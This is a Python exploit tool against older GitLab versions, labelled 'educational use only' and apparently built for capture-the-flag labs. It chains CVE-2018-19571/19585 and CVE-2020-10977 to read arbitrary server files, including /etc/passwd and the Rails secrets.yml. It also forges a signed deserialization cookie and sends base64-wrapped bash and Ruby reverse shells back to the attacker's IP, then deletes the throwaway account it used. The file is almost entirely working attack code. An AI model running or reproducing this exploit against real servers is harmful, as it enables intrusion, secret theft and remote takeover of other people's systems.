|
""" |
|
Gitlab RCE+LFI version <= 11.4.7, 12.4.0-12.8.1 - EDUCATIONAL USE ONLY |
|
CVEs: CVE-2018-19571 (SSRF) + CVE-2018-19585 (CRLF) |
|
CVE-2020-10977 |
|
""" |
|
|
|
import base64 |
|
import hashlib |
|
import hmac |
|
from html.parser import HTMLParser |
|
import random |
|
import string |
|
import sys |
|
import time |
|
import urllib.parse |
|
import urllib3 |
|
|
|
import requests |
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
|
|
|
|
|
class GitlabRCE: |
|
description = "oopsie woopsie we made a fucky wucky a wittle fucko boingo!" |
|
|
|
def __init__(self, gitlab_url, local_ip): |
|
self.url = gitlab_url |
|
self.local_ip = local_ip |
|
self.port = 42069 |
|
# change this if the gitlab has restricted email domains |
|
self.email_domain = "gmail.htb" |
|
self.session = requests.session() |
|
self.username = "" |
|
self.password = "" |
|
self.projects = [] |
|
self.issues = [] |
|
|
|
def get_authenticity_token(self, url, i=-1): |
|
result = self.session.get(url, verify=False) |
|
parser = GitlabParse() |
|
token = parser.feed(result.text, i) |
|
if not token: |
|
print("could not get token!") |
|
self.abort() |
|
return token |
|
|
|
def randomize(self): |
|
sequence = string.ascii_letters + string.digits |
|
random_list = random.choices(sequence, k=10) |
|
random_string = "".join(random_list) |
|
return random_string |
|
|
|
def register_user(self): |
|
authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in") |
|
self.username = self.randomize() |
|
self.password = self.randomize() |
|
email = "{}@{}".format(self.username, self.email_domain) |
|
data = {"new_user[email]": email, "new_user[email_confirmation]": email, "new_user[username]": self.username, |
|
"new_user[name]": self.username, "new_user[password]": self.password, |
|
"authenticity_token": authenticity_token} |
|
result = self.session.post(self.url + "/users", data=data, verify=False) |
|
print("registering {}:{} - {}".format(self.username, self.password, result.status_code)) |
|
|
|
def login_user(self): |
|
authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in", 0) |
|
data = {"authenticity_token": authenticity_token, "user[login]": self.username, "user[password]": self.password} |
|
result = self.session.post(self.url + "/users/sign_in", data=data, verify=False) |
|
print(result.status_code) |
|
|
|
def delete_user(self): |
|
authenticity_token = self.get_authenticity_token(self.url + "/profile/account") |
|
data = {"authenticity_token": authenticity_token, "_method": "delete", "password": self.password} |
|
result = self.session.post(self.url + "/users", data=data, verify=False) |
|
print("delete user {} - {}".format(self.username, result.status_code)) |
|
|
|
def create_empty_project(self): |
|
authenticity_token = self.get_authenticity_token(self.url + "/projects/new") |
|
project = self.randomize() |
|
self.projects.append(project) |
|
data = {"authenticity_token": authenticity_token, "project[ci_cd_only]": "false", "project[name]": project, |
|
"project[path]": project, "project[visibility_level]": "0", |
|
"project[description]": "all your base are belong to us"} |
|
result = self.session.post(self.url + "/projects", data=data, verify=False) |
|
print("creating project {} - {}".format(project, result.status_code)) |
|
|
|
def create_issue(self, project_id, text): |
|
issue_link = "{}/{}/{}/issues".format(self.url, self.username, project_id) |
|
authenticity_token = self.get_authenticity_token(issue_link + "/new") |
|
issue_title = self.randomize() |
|
self.issues.append(issue_title) |
|
data = {"authenticity_token": authenticity_token, "issue[title]": issue_title, "issue[description]": text} |
|
result = self.session.post(issue_link, data=data, verify=False) |
|
print("creating issue {} for project {} - {}".format(issue_title, project_id, result.status_code)) |
|
|
|
def main(self): |
|
print("main is not implemented") |
|
|
|
def prepare_payload(self): |
|
print("prepare_payload is not implemented") |
|
|
|
def abort(self): |
|
print("Something went wrong! ABORT MISSION!") |
|
exit() |
|
|
|
class GitlabRCE1147(GitlabRCE): |
|
description = "RCE for Version <=11.4.7" |
|
|
|
def exploit_project_creation(self, payload): |
|
authenticity_token = self.get_authenticity_token(self.url + "/projects/new") |
|
project = self.randomize() |
|
self.projects.append(project) |
|
payload_template = """git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ |
|
multi |
|
sadd resque:gitlab:queues system_hook_push |
|
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|{payload} \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" |
|
exec |
|
exec |
|
exec""" |
|
# using replace for formating is shit!! too bad... |
|
payload = payload_template.replace("{payload}", payload) |
|
data = {"authenticity_token": authenticity_token, "project[import_url]": payload, |
|
"project[ci_cd_only]": "false", "project[name]": project, |
|
"project[path]": project, "project[visibility_level]": "0", |
|
"project[description]": "all your base are belong to us"} |
|
result = self.session.post(self.url + "/projects", data=data, verify=False) |
|
print("hacking in progress - {}".format(result.status_code)) |
|
|
|
def prepare_payload(self): |
|
payload = "bash -i >& /dev/tcp/{}/{} 0>&1".format(self.local_ip, self.port) |
|
wrapper = "echo {base64_payload} | base64 -d | /bin/bash" |
|
base64_payload = base64.b64encode(payload.encode()).decode("utf-8") |
|
payload = wrapper.format(base64_payload=base64_payload) |
|
return payload |
|
|
|
def main(self): |
|
self.register_user() |
|
self.exploit_project_creation(self.prepare_payload()) |
|
time.sleep(10) |
|
self.delete_user() |
|
|
|
|
|
class GitlabRCE1281LFI(GitlabRCE): |
|
description = "LFI for version 10.4-12.8.1 and maybe more" |
|
|
|
def __init__(self, gitlab_url, local_ip, file_to_lfi="/etc/passwd"): |
|
super(GitlabRCE1281LFI, self).__init__(gitlab_url, local_ip) |
|
self.file_to_lfi = file_to_lfi |
|
|
|
def get_file(self, url, filename): |
|
print("Grabbing file {}".format(filename)) |
|
result = self.session.get(url, verify=False) |
|
return result.text |
|
|
|
def get_technical_id_of_project(self, project_id): |
|
url = "{}/{}/{}".format(self.url, self.username, project_id) |
|
result = self.session.get(url, verify=False) |
|
parser = ProjectIDParse() |
|
technical_id = parser.feed(result.text) |
|
return technical_id |
|
|
|
def extract_link_from_issue_json(self, issue_json, project_id): |
|
field = issue_json["description"] |
|
file_name = field[field.find("[") + 1:field.find("]")] |
|
file_path = field[field.find("(") + 1:field.find(")")] |
|
url = "{}/{}/{}{}".format(self.url, self.username, project_id, file_path) |
|
return url, file_name |
|
|
|
def lfi_path(self): |
|
return "![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})".format( |
|
self.file_to_lfi) |
|
|
|
def exploit_move_issue(self): |
|
project = self.projects[0] |
|
other_project = self.projects[-1] |
|
url = "{}/{}/{}/issues/1".format(self.url, self.username, project) |
|
technical_project_id_other_project = self.get_technical_id_of_project(other_project) |
|
authenticity_token = self.get_authenticity_token(url) |
|
issue_json = {"move_to_project_id": technical_project_id_other_project} |
|
self.session.headers["X-CSRF-Token"] = authenticity_token |
|
self.session.headers["Referer"] = url |
|
result = self.session.post(url + "/move", json=issue_json, verify=False) |
|
print("moving issue from {} to {} - {}".format(project, other_project, result.status_code)) |
|
url, filename = self.extract_link_from_issue_json(result.json(), other_project) |
|
file_content = self.get_file(url, filename) |
|
return file_content |
|
|
|
def main(self): |
|
self.register_user() |
|
self.create_empty_project() |
|
self.create_empty_project() |
|
self.create_issue(self.projects[0], self.lfi_path()) |
|
file_content = self.exploit_move_issue() |
|
print(file_content) |
|
self.delete_user() |
|
|
|
|
|
class GitlabRCE1281RCE(GitlabRCE1281LFI): |
|
description = "RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP" |
|
|
|
def parse_secrets(self, secrets): |
|
secret_key_base = secrets[secrets.find("secret_key_base: ") + 17:secrets.find("otp_key_base") - 3] |
|
return secret_key_base |
|
|
|
def get_ruby_shit_byte(self): |
|
# ruby marshal REEEEEEEEEEEEEE |
|
length = len(self.local_ip) + len(str(self.port)) - 8 |
|
possible_shit_bytes = "jklmnopqrstuvw" |
|
return possible_shit_bytes[length] |
|
|
|
def build_payload(self, secret): |
|
payload = "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instanceo:\bERB\b:\t@srcI\"{ruby_shit_byte}exit if fork;c=TCPSocket.new(\"{ip}\",{port});while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\x06:\x06ET:\x0E@filenameI\"\x061\x06;\tT:\f@linenoi\x06:\f@method:\vresult:\t@varI\"\f@result\x06;\tT:\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06;\tT" |
|
payload = payload.replace("{ip}", self.local_ip).replace("{port}", str(self.port)).replace("{ruby_shit_byte}", |
|
self.get_ruby_shit_byte()) |
|
key = hashlib.pbkdf2_hmac("sha1", password=secret.encode(), salt=b"signed cookie", iterations=1000, dklen=64) |
|
base64_payload = base64.b64encode(payload.encode()) |
|
digest = hmac.new(key, base64_payload, digestmod=hashlib.sha1).hexdigest() |
|
return base64_payload.decode() + "--" + digest |
|
|
|
def send_payload(self, payload): |
|
cookie = {"experimentation_subject_id": payload} |
|
result = self.session.get(self.url + "/users/sign_in", cookies=cookie, verify=False) |
|
print("deploying payload - {}".format(result.status_code)) |
|
|
|
def main(self): |
|
self.file_to_lfi = "/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml" |
|
self.register_user() |
|
self.create_empty_project() |
|
self.create_empty_project() |
|
self.create_issue(self.projects[0], self.lfi_path()) |
|
file_contents = self.exploit_move_issue() |
|
secret = self.parse_secrets(file_contents) |
|
payload = self.build_payload(secret) |
|
self.send_payload(payload) |
|
self.delete_user() |
|
|
|
|
|
class GitlabRCE1281LFIUser(GitlabRCE1281LFI): |
|
def main(self): |
|
self.file_to_lfi = self.ask_for_lfi_path() |
|
super(GitlabRCE1281LFIUser, self).main() |
|
|
|
def ask_for_lfi_path(self): |
|
lfi_path = input( |
|
"please type in the fully qualified path of the file you want to LFI. Uses {} when left empty: ".format( |
|
self.file_to_lfi)) |
|
lfi_path = lfi_path.strip() |
|
if not lfi_path: |
|
return self.file_to_lfi |
|
return lfi_path |
|
|
|
|
|
class GitlabVersion(GitlabRCE): |
|
def test(self): |
|
try: |
|
result = self.session.get(self.url, verify=False) |
|
if result.status_code not in [200, 302]: |
|
raise Exception("Host {} seems down".format(self.url)) |
|
except Exception as e: |
|
print(e) |
|
self.abort() |
|
|
|
def get_version(self): |
|
result = self.session.get(self.url + "/help", verify=False) |
|
print("Getting version of {} - {}".format(self.url, result.status_code)) |
|
parse = VersionParse() |
|
version = parse.feed(result.text) |
|
return version |
|
|
|
def main(self): |
|
self.test() |
|
self.register_user() |
|
version = self.get_version() |
|
print("The Version seems to be {}! Choose wisely".format(version)) |
|
self.delete_user() |
|
if not version: |
|
print("Could not get version!") |
|
self.abort() |
|
|
|
|
|
class GitlabParse(HTMLParser): |
|
def __init__(self): |
|
super(GitlabParse, self).__init__() |
|
self.tokens = [] |
|
self.current_name = "" |
|
|
|
def handle_starttag(self, tag, attrs): |
|
if tag == "input": |
|
for name, value in attrs: |
|
if self.current_name == "authenticity_token" and name == "value": |
|
self.tokens.append(value) |
|
self.current_name = value |
|
elif tag == "meta": |
|
for name, value in attrs: |
|
if self.current_name == "csrf-token": |
|
self.tokens.append(value) |
|
self.current_name = value |
|
|
|
def feed(self, data, i): |
|
super(GitlabParse, self).feed(data) |
|
try: |
|
return self.tokens[i] |
|
except IndexError: |
|
return None |
|
|
|
|
|
class ProjectIDParse(HTMLParser): |
|
def __init__(self): |
|
super(ProjectIDParse, self).__init__() |
|
self.project_found = False |
|
self.project_id = None |
|
|
|
def feed(self, data): |
|
super(ProjectIDParse, self).feed(data) |
|
return self.project_id |
|
|
|
def handle_starttag(self, tag, attrs): |
|
for name, value in attrs: |
|
if self.project_found and name == "value": |
|
self.project_id = int(value) |
|
return |
|
self.project_found = name == "id" and value == "project_id" |
|
|
|
|
|
class VersionParse(HTMLParser): |
|
def __init__(self): |
|
super(VersionParse, self).__init__() |
|
self.found_version = False |
|
self.version = None |
|
|
|
def handle_starttag(self, tag, attrs): |
|
if tag == "a": |
|
for name, value in attrs: |
|
self.found_version = name == "href" and "/tags/v" in value |
|
|
|
def handle_data(self, data): |
|
if self.found_version and not self.version: |
|
self.version = data |
|
|
|
def feed(self, data): |
|
super(VersionParse, self).feed(data) |
|
return self.version |
|
|
|
|
|
class Runner: |
|
def __init__(self): |
|
self.available_classes = [GitlabRCE1147, GitlabRCE1281LFIUser, GitlabRCE1281RCE] |
|
self.local_ip = None |
|
self.gitlab_url = None |
|
self.run() |
|
|
|
def banner(self): |
|
print("Gitlab Exploit by dotPY [insert fancy ascii art]") |
|
|
|
def get_version(self): |
|
class_ = GitlabVersion(self.gitlab_url, self.local_ip) |
|
class_.main() |
|
|
|
def list_options_and_choose(self): |
|
number = None |
|
for i, class_ in enumerate(self.available_classes): |
|
print("[{}] - {} - {}".format(i, class_.__name__, class_.description)) |
|
while number not in range(len(self.available_classes)): |
|
try: |
|
number = int(input("type a number and hit enter to choose exploit: ")) |
|
except ValueError: |
|
pass |
|
|
|
return self.available_classes[number] |
|
|
|
def run_chosen_exploit(self, chosen_exploit): |
|
class_ = chosen_exploit(self.gitlab_url, self.local_ip) |
|
input("Start a listener on port {port} and hit enter (nc -vlnp {port})".format(port=class_.port)) |
|
class_.main() |
|
|
|
def run(self): |
|
args = sys.argv |
|
if len(args) != 3: |
|
print("usage: {} <http://gitlab:port> <local-ip>".format(args[0])) |
|
return |
|
else: |
|
self.gitlab_url = args[1] |
|
self.local_ip = args[2] |
|
self.start() |
|
|
|
def start(self): |
|
self.banner() |
|
self.get_version() |
|
class_ = self.list_options_and_choose() |
|
self.run_chosen_exploit(class_) |
|
|
|
|
|
r = Runner() |